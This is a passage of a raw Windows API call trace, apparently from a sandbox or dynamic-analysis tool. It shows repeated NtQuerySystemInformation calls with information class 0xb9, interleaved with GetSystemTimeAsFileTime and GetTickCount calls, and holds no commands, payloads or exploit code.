NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfd410 | out: lpSystemTimeAsFileTime=0xc751dfd410*(dwLowDateTime=0xdca4b8a5, dwHighDateTime=0x1d5fb6e)) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c8, Length=0x50, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0206.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd318, Length=0x50, ResultLength=0x0) [0206.978] GetTickCount () returned 0x11746ef [0206.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x28, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf70, Length=0x28, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcff0, Length=0x28, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce60, Length=0x20, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfced0, Length=0x20, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0c0, Length=0x38, ResultLength=0x0) [0206.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x20, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x20, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e8, Length=0x58, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0206.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x20, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce50, Length=0x20, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcde0, Length=0x20, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x58, ResultLength=0x0) [0207.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce00, Length=0x28, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x28, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x38, ResultLength=0x0) [0207.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcef0, Length=0x28, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd10, Length=0x20, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 